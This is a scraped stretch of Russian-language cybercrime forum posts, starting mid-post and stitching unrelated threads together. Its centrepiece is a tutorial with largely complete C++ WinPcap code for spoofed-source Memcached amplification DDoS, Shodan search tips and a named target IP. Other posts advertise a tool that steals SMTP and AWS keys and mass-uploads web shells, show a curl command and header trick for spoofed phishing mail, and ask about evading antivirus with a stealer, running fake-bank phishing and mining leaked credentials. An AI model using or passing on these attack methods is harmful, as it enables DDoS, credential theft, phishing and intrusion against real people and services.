на этот сервис, и заметил, что один и тот же человек, выкладывает сообщение о
поиске инсталлов с разных аккаунтов, я решил попробовать его методику, не
поверите прокатило, с разных аккаунтов, я написал несколько объявлений, мне
пролили одни и те же люди разный трафик, то есть "соседей" не увидел вообще,
конкретных людей я там не назову, так как ни в ком не уверен и пользоваться их
услугами приходится на свой страх и риск, да немногие дают тест вперед, но
многие льют качество, которое конечно же не могут предоставить биржи.
В общем с трех аккаунтов от одного и того же молодого человека или старого
дедушки я получил очень качественный траф, соответсвенно сделал вывод, нужно
брать постоянно только тестовый траф, потому что для теста, эти граждане
выкладываются на 1000%
С биржами конечно же работают очень много паблишеров, я постоянно связываюсь с
разными администраторами разных бирж, с которых и вытягиваю информацию о том
или ином паблишере, они не охотно но выдают его контакты, всё зависит от
умения располагать к себе человека в беседе, с англоязычными народами у
русскоязычного человека это получается очень неплохо, ну и в принципе уровень
техники Социальной Инженерии много чем сможет Вам помочь
К чему вся эта тема ??? Да только к тому чтобы, на рынке появился качественный "материал для работы"...... Ну и чем больше народу будет рассекать в этой сфере, тем меньше будет арбитражей на различных скамеров, которые "плюют в свой же колодец", надеюсь Вы понимаете о чем я, ищите трафик сами, у Вас это неплохо получится, главное терпение, и не гонитесь за халявой и автоматизацией, хз, может я старомоден........
Скоро напишу за несколько бирж инсталлов, с подробностями в апруве и скриншотами
Донатить можно сюда ETH: 0xa7b3fbaee004c3cf6e75efb7b1633e4ba2b88662
Проходят годы, а DDoS остается мощным инструментом хакерских группировок.
Ежедневно в мире происходит 500–1000 атак такого типа. Каждый раз
злоумышленники находят новые уязвимости в популярных сервисах, которые
позволяют проводить атаки «с усилением». Разработчики Windows активно борются
с этим, усложняя жизнь хакерам и отсекая вредоносные запросы на системном
уровне. Мы сегодня поговорим о том, как эти преграды обходят.
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Feb9be94be9b4ba64ceec4764e024f27e%2F22324%2Fimage1.png&hash=018b3d4b80d02a599f759d2e8ebda663)
Как видно из статистики, наиболее распространенный вектор — это атаки на
сервисы (или с использованием сервисов), которые используют протокол UDP.
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Feb9be94be9b4ba64ceec4764e024f27e%2F22325%2Fimage2.png&hash=17e811f27cb2ed4ad77d6ca527bcb83c)
Здесь все очень просто. UDP, в отличие от других протоколов, не требует
сессии, а ответ на запросы отправляется немедленно. В этом основа атаки «с
усилением». Мы можем формировать запросы к некоторым сервисам таким образом,
чтобы ответ был в десятки раз больше, чем сам запрос. Соответственно, если эти
ответы будут перенаправлены на машину жертвы, атакующий сможет генерировать
трафик невероятной мощности.
Чтобы предотвратить такого рода атаки, разработчики из Microsoft установили ограничения на манипулирование пакетами.
[Подробности в документации Microsoft](https://docs.microsoft.com/en-
us/windows/win32/winsock/tcp-ip-raw-sockets-2?redirectedfrom=MSDN).
Обрати внимание на этот пункт документации.
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Feb9be94be9b4ba64ceec4764e024f27e%2F22326%2Fimage3.png&hash=41f9e21e8772b2f0418afa9731adc8a0)
Прямо заявлено, что ОС не позволит отправлять UDP-пакеты с полем IP-адреса
поддельного отправителя.
Зачем нам это нужно? Дело в том, что трафик, который мы получаем от уязвимых ответов служб, может быть каким‑то образом перенаправлен на серверы жертв. А этого можно добиться, просто изменив IP-адрес отправителя в заголовке UDP- пакета. Тогда уязвимый сервер подумает, что запрос поступил с компьютера жертвы, и отправит на него ответ.
Кто не знаком со структурой пакета UDP, может посмотреть на табличку ниже. Там ничего особенного нет, формирование самого пакета мы разберем позже.
![User Datagram Protocol](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Feb9be94be9b4ba64ceec4764e024f27e%2F22327%2Fimage4.png&hash=97bcc36f5547df0562285001c87e8b30)
User Datagram Protocol
Собственно, из документации понятно, что стандартные инструменты и библиотеки Windows не позволяют подделывать адрес отправителя. Для проведения DDoS это нужно обойти, и на помощь злодею или желающему провести нагрузочный тест приходит такая волшебная вещь, как WinPcap.
С WinPcap можно формировать пакеты отправки независимо от инструментов Windows. И это не просто библиотека для обработки пакетов для C++, а собственный драйвер NPF.
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Feb9be94be9b4ba64ceec4764e024f27e%2F22328%2Fimage5.gif&hash=9be0cd93ee2fea7afe9f360eef9e9ae1)
Если вкратце, то это работает так. Мы можем установить кастомный драйвер
протокола, при написании программы мы будем ссылаться на него. Оттуда пакеты
будут передаваться на драйвер Network interface card (NIC) и идти дальше по
сети. Таким образом мы сможем полностью контролировать процесс создания и
инкапсуляции пакетов.
Для поиска уязвимых серверов широко используется поисковик Shodan. Давай для примера попробуем найти серверы Memcached, которые использовались для атаки на Github несколько лет назад. Вводим product:"Memcached" и видим, что серверов остается все еще очень много.
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Feb9be94be9b4ba64ceec4764e024f27e%2F22329%2Fimage6.png&hash=35630a671ea65f6dacc1a794a6c54ad9)
Разработчик исправил уязвимость и теперь порт, назначенный по умолчанию,
заменен с 11211 на TCP. Но, несмотря на это, в интернете остались тысячи
уязвимых серверов.
У Shodan есть [фильтры](https://help.shodan.io/the-basics/search-query- fundamentals), которые помогают искать необходимые сервисы и серверы. Для практики можно попробовать найти сервисы RDP с портом UDP/3389, которые также [уязвимы](https://www.netscout.com/blog/asert/microsoft-remote-desktop- protocol-rdp-reflectionamplification) для атак амплификации (с коэффициентом 85,9:1).
Мы можем создать программу для эксплуатации уязвимости серверов Memcached, DDoS с усилением. Прежде всего нужно настроить рабочую среду.
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2Feb9be94be9b4ba64ceec4764e024f27e%2F22330%2Fimage7.png&hash=65e9326a73e76565fa996acb9155ac58)
![Файлы с заголовками](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Feb9be94be9b4ba64ceec4764e024f27e%2F22331%2Fimage8.png&hash=e684fd044f2b6b1fc1692d4acccceb14)
Файлы с заголовками
![Макросы](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Feb9be94be9b4ba64ceec4764e024f27e%2F22332%2Fimage9.png&hash=d68fcb97803f124351bf9b81a3c470e1)
Макросы
В самом проекте я использовал следующие модули:
Code:Copy to clipboard
#define _ALLOW_KEYWORD_MACROS // Отключить предупреждение
#include <winsock2.h> // Здесь нужные нам функции, такие как htons() htonl()
#pragma comment (lib,"WS2_32.lib")
#include <Iphlpapi.h>// Поможет нам найти информацию про сетевые адаптеры и их характеристики
#pragma comment (lib,"Iphlpapi.lib")
#include <pcap/pcap.h> // Собственно, WinPcap
#pragma comment (lib,"wpcap.lib")
#include <iostream> // Здесь нам нужна функция sprintf()
#include <stdio.h>
#include <thread>
#define HOST sin_addr.S_un.S_addr // Переменные для пакета
using namespace std;
Перейдем к главной задаче программы — формированию пакетов. Пойдем по пунктам.
Code:Copy to clipboard
string devices[15];
void ShowDeviceList(void)
{
char Error[PCAP_ERRBUF_SIZE];
pcap_if_t* Devices; pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &Devices, Error);
int i = 1;
for (pcap_if_t* CurrentDevice = Devices; CurrentDevice != NULL; CurrentDevice = CurrentDevice->next)
{
devices[i] = CurrentDevice->description;
//string a = CurrentDevice->description;
//cout << i << ". " << a << endl;
i++;
}
}
Далее ты можешь вывести их удобным способом, выбрать и использовать для отправки.
Например, в моей программе это выглядит как на скриншоте ниже.
[![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3681460b304cfb1a4f987203c303f1ae%2F22335%2Fimage10.jpg&hash=f447e9ba87f955f8da4899568af2cb6c)](https://st768.s3.eu- central-1.amazonaws.com/3681460b304cfb1a4f987203c303f1ae/22335/image10.jpg)
Code:Copy to clipboard
unsigned char* FinalPacket;
unsigned int UserDataLen;
unsigned short BytesTo16(unsigned char X, unsigned char Y)
{
unsigned short Tmp = X;
Tmp = Tmp << 8;
Tmp = Tmp | Y;
return Tmp;
}
unsigned int BytesTo32(unsigned char W, unsigned char X, unsigned char Y, unsigned char Z)
{
unsigned int Tmp = W;
Tmp = Tmp << 8;
Tmp = Tmp | X;
Tmp = Tmp << 8;
Tmp = Tmp | Y;
Tmp = Tmp << 8;
Tmp = Tmp | Z;
return Tmp;
}
unsigned char* MACStringToBytes(LPSTR String)
{
char* Tmp = new char[strlen(String)];
memcpy((void*)Tmp, (void*)String, strlen(String));
unsigned char* Returned = new unsigned char[6];
for (int i = 0; i < 6; i++)
{
sscanf(Tmp, "%2X", &Returned[i]);
memmove((void*)(Tmp), (void*)(Tmp + 3), 19 - i * 3);
}
return Returned;
}
unsigned short CalculateIPChecksum(UINT TotalLen, UINT ID, UINT SourceIP, UINT DestIP)
{
unsigned short CheckSum = 0;
for (int i = 14; i < 34; i += 2)
{
tools tool2;
unsigned short Tmp = tool2.BytesTo16(FinalPacket[i], FinalPacket[i + 1]);
unsigned short Difference = 65535 - CheckSum;
CheckSum += Tmp;
if (Tmp > Difference) { CheckSum += 1; }
}
CheckSum = ~CheckSum;
return CheckSum;
}
unsigned short CalculateUDPChecksum(unsigned char* UserData, int UserDataLen, UINT SourceIP, UINT DestIP, USHORT SourcePort, USHORT DestinationPort, UCHAR Protocol)
{
unsigned short CheckSum = 0;
unsigned short PseudoLength = UserDataLen + 8 + 9; //Length of PseudoHeader = Data Length + 8 bytes UDP header (2Bytes Length,2 Bytes Dst Port, 2 Bytes Src Port, 2 Bytes Checksum)
//+ Two 4 byte IP's + 1 byte protocol
PseudoLength += PseudoLength % 2; // If bytes are not an even number, add an extra.
unsigned short Length = UserDataLen + 8; // This is just UDP + Data length needed for actual data in udp header
unsigned char* PseudoHeader = new unsigned char[PseudoLength];
for (int i = 0; i < PseudoLength; i++) { PseudoHeader[i] = 0x00; }
PseudoHeader[0] = 0x11;
memcpy((void*)(PseudoHeader + 1), (void*)(FinalPacket + 26), 8); // Source and Dest IP
Length = htons(Length);
memcpy((void*)(PseudoHeader + 9), (void*)&Length, 2);
memcpy((void*)(PseudoHeader + 11), (void*)&Length, 2);
memcpy((void*)(PseudoHeader + 13), (void*)(FinalPacket + 34), 2);
memcpy((void*)(PseudoHeader + 15), (void*)(FinalPacket + 36), 2);
memcpy((void*)(PseudoHeader + 17), (void*)UserData, UserDataLen);
for (int i = 0; i < PseudoLength; i += 2)
{
tools tool2;
unsigned short Tmp = tool2.BytesTo16(PseudoHeader[i], PseudoHeader[i + 1]);
unsigned short Difference = 65535 - CheckSum;
CheckSum += Tmp;
if (Tmp > Difference) { CheckSum += 1; }
}
CheckSum = ~CheckSum; //One's complement
return CheckSum;
}
void SendPacket(pcap_if_t* Device)
{
char Error[256];
pcap_t* t;
t = pcap_open(Device->name, 65535, PCAP_OPENFLAG_DATATX_UDP, 1, NULL, Error);//FP for send
pcap_sendpacket(t, FinalPacket, UserDataLen + 42);
pcap_close(t);
}
void CreatePacket
(unsigned char* SourceMAC,
unsigned char* DestinationMAC,
unsigned int SourceIP,
unsigned int DestIP,
unsigned short SourcePort,
unsigned short DestinationPort,
unsigned char* UserData,
unsigned int UserDataLen)
{
UserDataLen = UserDataLen;
FinalPacket = new unsigned char[UserDataLen + 42]; // Reserve enough memory for the length of the data plus 42 bytes of headers
USHORT TotalLen = UserDataLen + 20 + 8; // IP Header uses length of data plus length of ip header (usually 20 bytes) plus lenght of udp header (usually 8)
//Beginning of Ethernet II Header
memcpy((void*)FinalPacket, (void*)DestinationMAC, 6);
memcpy((void*)(FinalPacket + 6), (void*)SourceMAC, 6);
USHORT TmpType = 8;
memcpy((void*)(FinalPacket + 12), (void*)&TmpType, 2); //The type of protocol used. (USHORT) Type 0x08 is UDP. You can change this for other protocols (e.g. TCP)
// Beginning of IP Header
memcpy((void*)(FinalPacket + 14), (void*)"\x45", 1); //The Version (4) in the first 3 bits and the header length on the last 5. (Im not sure, if someone could correct me plz do)
//If you wanna do any IPv6 stuff, you will need to change this. but i still don't know how to do ipv6 myself =s
memcpy((void*)(FinalPacket + 15), (void*)"\x00", 1); //Differntiated services field. Usually 0
TmpType = htons(TotalLen);
memcpy((void*)(FinalPacket + 16), (void*)&TmpType, 2);
TmpType = htons(0x1337);
memcpy((void*)(FinalPacket + 18), (void*)&TmpType, 2);// Identification. Usually not needed to be anything specific, esp in udp. 2 bytes (Here it is 0x1337
memcpy((void*)(FinalPacket + 20), (void*)"\x00", 1); // Flags. These are not usually used in UDP either, more used in TCP for fragmentation and syn acks i think
memcpy((void*)(FinalPacket + 21), (void*)"\x00", 1); // Offset
memcpy((void*)(FinalPacket + 22), (void*)"\x80", 1); // Time to live. Determines the amount of time the packet can spend trying to get to the other computer. (I see 128 used often for this)
memcpy((void*)(FinalPacket + 23), (void*)"\x11", 1);// Protocol. UDP is 0x11 (17) TCP is 6 ICMP is 1 etc
memcpy((void*)(FinalPacket + 24), (void*)"\x00\x00", 2); //checksum
memcpy((void*)(FinalPacket + 26), (void*)&SourceIP, 4); //inet_addr does htonl() for us
memcpy((void*)(FinalPacket + 30), (void*)&DestIP, 4);
//Beginning of UDP Header
TmpType = htons(SourcePort);
memcpy((void*)(FinalPacket + 34), (void*)&TmpType, 2);
TmpType = htons(DestinationPort);
memcpy((void*)(FinalPacket + 36), (void*)&TmpType, 2);
USHORT UDPTotalLen = htons(UserDataLen + 8); // UDP Length does not include length of IP header
memcpy((void*)(FinalPacket + 38), (void*)&UDPTotalLen, 2);
memcpy((void*)(FinalPacket+40),(void*)&TmpType,2); //checksum
memcpy((void*)(FinalPacket + 42), (void*)UserData, UserDataLen);
unsigned short UDPChecksum = CalculateUDPChecksum(UserData, UserDataLen, SourceIP, DestIP, htons(SourcePort), htons(DestinationPort), 0x11);
memcpy((void*)(FinalPacket + 40), (void*)&UDPChecksum, 2);
unsigned short IPChecksum = htons(CalculateIPChecksum(TotalLen, 0x1337, SourceIP, DestIP));
memcpy((void*)(FinalPacket + 24), (void*)&IPChecksum, 2);
return;
}
Code:Copy to clipboard
pcap_if_t* ChosenDevice;
char SourceIP[16] = "111.221.111.111";
for (int i = 0; i < 16; i++) {
SourceIP[i] = target_ip[i];
}
char SourcePort[6] = "11211";
char SourceMAC[19] = "00:26:57:00:1f:02";
char DestinationIP[16] = "192.168.0.105";
for (int i = 0; i < 16; i++) {
DestinationIP[i] = bot_ip[i];
}
char DestinationPort[6] = "11211";
char DataString[2048] = "stats";
int chosen = chosen_device;
DeviceInfo di;
di = tool1.GetAdapterInfo(ChosenDevice);
RawPacket RP;
RP.CreatePacket(tool1.MACStringToBytes(SourceMAC), di.GatewayPhysicalAddress,
inet_addr(SourceIP), inet_addr(DestinationIP),
atoi(SourcePort), atoi(DestinationPort),
(UCHAR*)DataString, strlen(DataString));
Code:Copy to clipboard
void SendPacket(pcap_if_t* Device)
{
char Error[256];
pcap_t* t;
t = pcap_open(Device->name, 65535, PCAP_OPENFLAG_DATATX_UDP, 1, NULL, Error);//FP for send
pcap_sendpacket(t, FinalPacket, UserDataLen + 42);
pcap_close(t);
}
RP.SendPacket(ChosenDevice);
Последние несколько строк можно поместить в цикл и начать DDoS-атаку. Тестовой целью будет сервер с адресом 18.181.248.145. В Wireshark это все будет выглядеть примерно так.
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Feb9be94be9b4ba64ceec4764e024f27e%2F22334%2Fimage11.png&hash=a206479a7efd879e44e8b5683aa1e17d)
Пакеты отправляются на уязвимые серверы, которые видят нашу цель в качестве
отправителя.
Код, описанный выше, самодостаточен. Если тебе придется писать эксплоит для подобной уязвимости, то, скорее всего, придется манипулировать только полями DataString (пейлоад), Dest / Source Port, Dest / Source IP.
Да, было бы гораздо проще сделать все это на Linux, и большинство таких программ написаны как раз таки для него. Но это не значит, что мы не можем экспериментировать и углублять знания!
автор:
Yuriy Sierpinskiy
www.linkedin.com/in/yuriy-
serpinskiy-48a785192/
Добрый день куплю сервис по реги ба под гугл адс которые привязываются инстант
Нужен такой как был Schwab где можно создать аккаунт на левые данные(с
генератора)
Готов отдать за сервис до 500$
Писать в л.с или телегу https://t.me/xnonamex1
Может ли кто-нибудь показать мне, как рандомизировать заголовки электронной почты в AMS Enterprise? Я пытался делать это в течение 3 месяцев, но безуспешно. У меня 1к SMTP, но в почтовый ящик попадает всего 10-15 писем.
Заранее спасибо!
Can anyone show me how to randomize email headers in AMS Enterprise? I tried to do this for 3 months without success. I have 1k SMTP, but only 10-15 letters get into the mailbox.
Thanks in advance!
Нужен траф адс плачу стабильно % $
Всем привет , подскажите пж как пройти модерацию на бирже инсталлов ???
Доброго дня всем, есть у кого идеи как анпейды на гугле побороть?
Доброго времени суток, коллеги.
Занимаюсь траффиком Google Ads, очень долго тестировал связки, очень много
денег потерял, но по итогу пришел к правильной стратегии.
Лью на свой фиш (на инсталлы).
Я думал нахождение правильной связки будет самой сложной проблемой в этом
деле. Но я ошибался.
Купил стиллер у реда, купил лоадер, криптанулся приваткой, но столкнулся с
Google Alert и Windows Defender.
Прочитав форум и хухл, пришел к выводу, что без сертификата никто не скачает
мой EXE.
Перейдем к сути данного поста - нужно ли покупать этот сертификат за 500-700$,
что продают на форуме?
Или как же всё таки обойти этот вредный Google Alert и Defender ?
Всем привет, дам серьезный траффик на ваши офферы, работаю по принцепу -
"командная работа".
Мат под рукой, сел и начал работать. Прежде чем вы будете мне писать, хочу
предупредить сразу, не работаю с (посредами).
Как человеку которого вы зовете и предлагаете свои офферы, мне нужны будут
доступы.
Пример:
I DON'T WORK WITH ENGLISH SPEAKERS !
писать TG @NeuralNetworksPP
В рассылке пока только начинающий, ищу здесь совета по своей проблеме, с
которой я столкнулся
В общем сама морда Хестии настроена
Веб домен вроде как настроен (настроек крайне мало)
так же в Почте настроен домен и сама рабочая почта для рассылки
Выданы данные: СМТП,Порт, учетка создана -> идём дальше
Переходим в HeartSender (Лицензия)
Если попытаться отсюда сделать тест SMTP - то уже получим ошибку при отправке
Но, что я только не перепробовал уже делать, ничего не получается
Пытаюсь грубо запустить тестовое письмо на новорег gmail и получаю ошибку
Проблема вероятнее всего в самом smtp сервере, только в чем, ума уже не
приложу
У кого опыта поболее поделитесь им пожалуйста
Порты открыты, с этим проблем нет
кто знает хороший sms-шлюз с мировым покрытием
Спасибо
Привет друзья. Есть акки ads с лимитом 350$. Можно ли с них реkламить офферы от партнёрок? Или лучше инсталлы? АКки есть, но в арбитраже не очень разбираюсь, тем более с Google ads. Подскажите, если не трудно. Да меня в гугле забанили! Ы). А если честно, то нагуглил одну водичку беспонтовую.
Есть в доступе 40 выделенных серверов
И несколько серверов, на которых по 50-90 виртуалок
Какие есть варианты монетизации с использованием этих серверов? И что-бы без абуз.
На всех серверах работают простые веб-сайты есть пару с выше среднего трафиком
(не всегда большой трафик)
В основном интересуют варианты с использованием ресурсов серверов.
все доступы с права root
Всем привет, имеется глупый вероятно вопрос, ввиду отсутсвия опыта, ситуация
такая:
Я решил полить с ГуглАдса на фишинг такой своеобразный, что-то типо
реверспрокси, не суть важна.
Лью без клоаки, Гугл пускает, траф идет, НО через несколько часов мой домен
отлетает за фиш.
Может ли быть проблема в отсутствии клоаки? Или в чем проблема?
Раньше не работал с лендингами вообще, поэтому нахожусь в небольшом
замешательстве, буду благодарен за идеи/наводки, спасибо.
помогите взломать(получить удаленный доступ либо доступ к файлам)
знаю лишь маил
точно винда
(могу спугнуть)
не так сильно во взломе силен мб еще какие нибудь мануалы? скиньте если не
сложно
Нужен траф адв на наши фейк банки 7 линков выплата инстант 20 юсд за валид ( баланс не важен) домены, фейки мои .
выпата инстант za valid )
ищу "мастера" в сфере инсталов. нужен человек который бы научил с нуля как выкапывать инсталы для pc и android ищу мастера в этом деле с репутацией. готов заплатить приличную сумму главное чтоб чотко с нуля научил повторюсь еще раз заплачу очень прилично с деньгами нет проблем. пожалуста не пишите те которые тока начали в этой теме мне нужен человек с опытом большим в ПМ срочно жду.
Laravel Monster V2
Hello Dear Fans Xss.is Forum
Laravel Monster V2 Script
For Free
All In One Program, Grabbing Lists, Grabbing SMTPS, Sms Sending , Aws Keys
ect.. ++ Auto Check ?
Only Python 3
1/ Download Python 3.8
![www.python.org](/proxy.php?image=https%3A%2F%2Fwww.python.org%2Fstatic%2Fopengraph- icon-200x200.png&hash=338f5ac76638ac5453f7f99d3bf07100&return_error=1)
](https://www.python.org/downloads/release/python-386/)
The official home of the Python Programming Language
www.python.org
2/ py -m pip install -r requirements.txt
3/ Download Perl
strawberryperl.com
————————-
️
12 Features
️
———————-—
?1/ Mass Grabber Only Valid, SMTPS, MYSQL, AWS KEYS, SendGRIDAPI (New Version), NEXMO, TWILIO
(Format Separated by "|" For quick checking results & only valid results,
Only Valid MySql ?
SMTPS with host|port|user|pass| ?
AWS KEYS Api_Key|Key_Secret ?
Sengrid Api Valid Results ?
SMTPS All In One File (Mailgun, 1and1, Zoho, Sendgrid, Aws, Office & Much
more.)
? 2/ AWS Quota Checker + Auto Crack Key (Create Aws Console, Mass RDPS/VPS/SES
Auto Check Valid Aws Keys ?
Auto Check Aws Quota, MailFrom & More Informations For Success Sending ?
Auto Try To Root Aws Console (Create Aws Dashbord) MASS RDPS/VPS/CPANEL ECT..
?
? 3/ MASS SMTPS CHECKER (New Version ++ Updates)
Port Changed Automaticly To A Working Ports For Increase Inbox Hit ?
Check All Kind Of SMTPS (SSL/TLS) ?
No Stop Checking ?
Results Saved In TXT File ++ Received Via Email (Inbox/Spam) ?
? 4/ Mass Sendgrid Api Checker
Auto Check Valid Keys ?
Auto Check Sendgrid Api Working For Sending ?
?5/ Mass Twilio Checker
Auto Check Valid Twilio Keys ?
Auto Grabb Information For Success Sending SMS ?
? 6/ Mass Nexmo Balance Checker
Auto Check Valid Nexmo Api ?
Auto Check Nexmo Balance ?
? 7/ Mass Zone-H Grabber
? 8/ Mass Advanced Dorker
Put Your Dorks in dorks.txt & It's done, ready to mass grabbing ?
Advanced dorker, No Stop, No need Vpn/Proxy ?
Fast Grabbing ?
? 9/ Mass Reverse Domains To IPS (No STOP, Updated Tool)
? 10/ Mass Ranger IPS (Perl Tool)
Grabb More IPS From Your IPS LISTS ?
Super Fast ?
? 11/ Mass Laravel & Wordpress Filter
Fast Filtring Only Laravel Sites (For Quick Grabbing & Checking (Earning
Times) )?
Fast Filtring Only Wordpress Sites (For BruteForce)?
Thnx Great
? 12/ Mass Upload Shell In Laravel Sites
Bypass All Issues Advanced Auto Uploader ?
Thnx Great To Admin Xss.is
Best Forum
Всем привет, в общем нашел ~~багу~~ фичу, которая позволяет на абсолютно нулевом канале, выдвинуть ролик на первое место в поиск по ключу/ам.
Те, создаем канал, заливаем ролик, и далее чуть манипуляций и в течении пары дней видос летит с абсолютного дна поиска до первых позиций, оставаясь там на какой-то промежуток времени неделя-две, потом падает, но это зависит от того уже, как часто другие ролики выходят с теми же ключами.
Информацию как это сделать, если постараться можно уместить в одну строку, если не стараться, то 2-3 строки будет хватать с головой.
Какой прайс на это дело? Я вижу примерно так, но может поправите меня.
1. Продавать как услугу продвижения ролика - 15к ролик
2. Продать маунал, в пару рук - 1кк?
Прайсы и на то и на то мне кажутся оверпрайсед пиздец, учитывая, что на все
требуется 10 минут времени, но с другой стороны способ реально оверпауер и
приносит боснословные средства.
Просто представьте, что ролик с РевШар партнеркой казино будет на первом месте
по запросу казино или более таматичекские ключи, да один въебанный депозит
человека отбивает условно затраченную пятнашку.
А ведь наверняка это далеко не самая лучшая модель монетизации.
Толкать можно просто все, что угодно, начиная от своего белого канала по рыбалке заканчивая какой-то чернухой.
В целом наверное все, необходим ваш ассистенс с ценообразованием.
Hi, i have an sms sender that is using ip pool with port 25 open. I need a big pool,millions of ip. Thank you
Встретил рк в адсе, на эту фигню:
Кто-нибудь знает, что это за оффер и где можно по нему же в принципе и начать
работать или это селф-мейд фигня?
На первый взгляд мне кажется, что конверс с такого лендоса минимальынй, но
если льют, значит профитно?
p.s. Прошу перенести тему, если не там создал.
Думаю вопрос понятен) что написать в письме , чтобы полюбому человек открыл
этот файл, или перешел по ссылки???)
лучше конечно чтобы он открыл пдф файл который в этом письме
очень срочно надо, буду благодарен
Какие есть сервисы рассылок по типу (unisender, sendpulse) через которые можно слать большие обьемы писем? письмо без ссылок и прикрепленных файлов, тема письма серая. Нужен инбокс, получатели в основном gmail.
Чтобы сделать фишинговую почтовую рассылку через уязвимый почтовый сервер, есть инструмент для автоматизированной отправки писем:
Script for send emails via public post services,. Contribute to empty- jack/MailHammer development by creating an account on GitHub.
github.com
Удобно проводить атаки с применением методов социальной инженерии. О нем рассказывали, когда проводили атаки с подменой отправителя на DefCon 7499 #13.
Скрипт для рассылки почты умеет:
Скрпит умеет отображать отправляемое письмо вместе с отправляемыми заголовками
при указании опции -v
. Скрипт получает все опций из конфига с помощью
аргумента -c
.
Для подделки заголовка From
ставьте оригинальный адрес в конец заголовка
From
, а поддельные имя и адрес на первое и второе место в заголовке. Пример:
Code:Copy to clipboard
Fake Name <fake@mail.ru> <legal@mail.ru>
1 2 3
> PS
CURL
умеет работать с smtp://
схемой. Пример работы с SMTP черзе CURL:
Bash:Copy to clipboard
curl -k --url "smtp://127.0.0.1" --mail-from "spoofing@example.com" --mail-rcpt "jdoe2@example.com" --upload-file ./message --user 'jdoe2@example.com:password' --ssl
Доброго времени суток, подскажите пожалуйста, как из большой баззы имейл:пасс (100кк имейлов) вытащить только корп мыльники и пасс? Заранее спасибо!
Spoiler: Содержание
**Описание:
Программа обучения**
01 Вводное занятие
- Правила прохождения курса
- Обзор рекламной платформы Facebook
- Путь таргетолога. Постановка индивидуальных целей на период обучения
02 How to Get Started
- Как создать Бизнес Страницу в Facebook. Их типы и назначение
- Буст постов на Бизнес Странице, эффективно ли использовать?
- Как создать рекламный аккаунт Facebook и привязать платежные инструменты
- Как связать Instagram бизнес страницу с рекламным аккаунтом в Facebook,
чтобы синхронизировать активности
- Правила рекламной деятельности на платформе Facebook & Instagram. Что нужно
делать, если ваш рекламный аккаунт заблокировали
03 Работа с Аудиториями Бизнес Страниц. Facebook Pixel и настройка конверсий
на веб-сайте
- Создаем аудитории бизнес страниц в Facebook & Instagram по уровням
вовлеченности
- Устанавливаем Facebook Pixel, настраиваем конверсии и создаем списки
ретаргетинга по посетителям веб-сайта
- Проверка работы Facebook Pixel (Pixel Helper)
- Создаем кастомные списки аудиторий на основе данных бизнеса
- Учимся создавать качественные LAL на основе баз данных,а также данных
пикселя
04 Выбираем цель рекламной кампании и учимся правильно настраивать таргетинг
- Обзор рекламного аккаунта и его структуры. Выбираем цель рекламной кампании
под конкретную бизнес задачу
- Настраиваем таргетинг правильно, чтобы избежать конкуренции на уровне
рекламного аккаунта и снизить стоимость конверсий
- Бонус: Учимся работать со скрытыми интересами в Facebook, чтобы формировать
уникальные сегменты и лучше попадать в ЦА
- Как работать с рекламными плейсментами (Facebook, Instagram, Messenger,
Instant Articles, Audience Network and so on)
05 Строим кампанию под привлечение трафика и ретаргетинг
- Как правильно построить структуру рекламной кампании и завести ее в кабинет
- Как создать кампанию под лид формы. В каких случаях эффективно
использовать, а каких нет
- Как рассчитать бюджет рекламной кампании, проводить рекламные тесты и
правильно оценивать результаты
- Разбор кейсов
06 Работа с креативами. Учимся создавать рекламные объявления
- Структура рекламного объявления
- Кастомизируем форматы рекламных объявлений под типы плейсментов для лучшей
эффективности
- Создание концепта и оформление объявлений. Создаем текст, заголовок, call
to action в рамках месседжа для аудитории
- Примеры и кейсы. Как смотреть креативы конкурентов
07 Как правильно читать результаты рекламных кампаний. Оптимизация результатов
- Как оценить эффективность рекламной кампании
- Как понять, эффективно ли работает оптимизация
- Как делать аналитику в разрезе ГЕО / гендера / плейсментов
- Как понять, что пришло время сменить креативы и как оценить их качество
08 Как упаковать себя и свои услуги, чтобы у вас хотелось купить
- Создадим уникальное предложение, которое определяет почему нужно покупать у
вас и именно сейчас
- Сформируем типы услуг и цены
- Создадим презентацию услуг и кейсы
- Проработаем личный бренд, позиционирование и социальное доказательство
- Упакуем личный профиль в Instagram
09 Продажи
- Создаем скрипты продаж
- Учимся эффективно обрабатывать возражения
- Автоматизируем работу со скриптами
- Узнаем, как обучить и организовать работу менеджера
- Поймем, как общаться с клиентами и вести учёт в CRM-системе
- Как и какие KPI отслеживать в отделе продаж
- С какими клиентами и нишами можно работать, а каких стоит избегать
10 Поиск и привлечение клиентов
- Пять проверенных способов бесплатного привлечения клиентов
- Двенадцать стратегий привлечения клиентов с вложениями в рекламу
- Какие каналы трафика выбрать для продвижения
- Какие объявления в рекламе сработают лучше
- Как лучше конвертировать заявки и куда переводить клиента с рекламы
- Проработка этапов продажи и воронки продаж
Источник:
https://targetorium.com/fis (не реклама)
Ссылка на скачивание :
You must have at least 10 reaction(s) to view the content.
Не дорого. За подробностями писать в ЛС.
Hello ,
I've stopped spamming since 2 years , now i tried to get back in business i
find that all the old ways are pretty much dead . I tried many SMTPS /
Webmails /Office365 but with no luck , i'm just trying to spam a specific
niche with only 10K to 20K blasts per send but to no avail , can someone
please be kind and share what are the methods that are working in 2020 ,
I heard about services like Sendinblue , sendgrid , mailjet etc but are they
really worth it ?
Cheers
PS: I know its a russian forum so forgive my english
ребят кто-нибудь слышал за битрат с hvnc который.
подумываю взять его.
какие могут быть подводные камни с этой крысой, отпишите если не сложно кто
работал с ней?
Spoiler: Содержание
Описание:
Программа курса:
1. Вводный блок
Плавное погружение в предмет изучения в формате «обзорной экскурсии». Здесь вы
получите всю необходимую информацию о терминах и метриках контекстной рекламы,
